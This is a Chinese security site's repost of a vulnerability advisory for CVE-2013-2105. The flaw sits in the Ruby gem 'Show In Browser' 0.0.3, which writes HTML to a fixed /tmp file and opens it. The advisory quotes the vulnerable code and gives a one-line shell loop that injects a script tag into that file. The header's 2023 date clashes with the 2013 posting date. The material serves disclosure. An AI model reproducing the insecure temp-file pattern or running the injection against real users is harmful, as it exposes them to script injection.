首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Show In Browser 0.0.3 Ruby Gem File Injection Vulnerability
来源:@_larry0 作者:Cashdollar 发布时间:2013-05-27  
TITLE: Show In Browser 0.0.3 Ruby Gem /tmp file injection vulnerability.
  
DATE: 5/15/2023
  
AUTHOR: Larry W. Cashdollar (@_larry0)
  
  
DESCRIPTION: Opens arbitrary text in your browser
  
VENDOR: Jonathan Leung
  
FIX: N/A
  
CVE: 2013-2105
  
DETAILS: The following code uses the temporary file "/tmp/browser.html" insecurely.
  
 2   FILE_LOCATION = "/tmp/browser.html"
  
3 4 class << self 5 6 def show(html)
  
 7       file = File.open(FILE_LOCATION, 'w')
 8       file.write(html)
 9       file.close
10 
11 `open #{FILE_LOCATION}`
  
  
By a malicious user creating /tmp/browser.html first and repeatedly writing to it they can inject malicious html into 
the file right before it is about to be opened.
  
PoC:
  
  
nobody () pitter:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/browser.html; done
  
Will pop up a java script alert in other gem users browser. 
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·SAS Integration Technologies C
·SIEMENS Solid Edge ST4 WebPart
·Nginx HTTP Server 1.3.9-1.4.0
·SIEMENS Solid Edge ST4 SEListC
·AdobeCollabSync Buffer Overflo
·CompatUI ActiveX Control <= Re
·Analysis of nginx 1.3.9/1.4.0
·HP LaserJet Pro P1606dn Passwo
·CodeBlocks 12.11 (Mac OS X) -
·win32k!EPATHOBJ::pprFlattenRec
·IBM SPSS SamplePower C1Tab Act
·Linksys WRT160nv2 apply.cgi Re
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved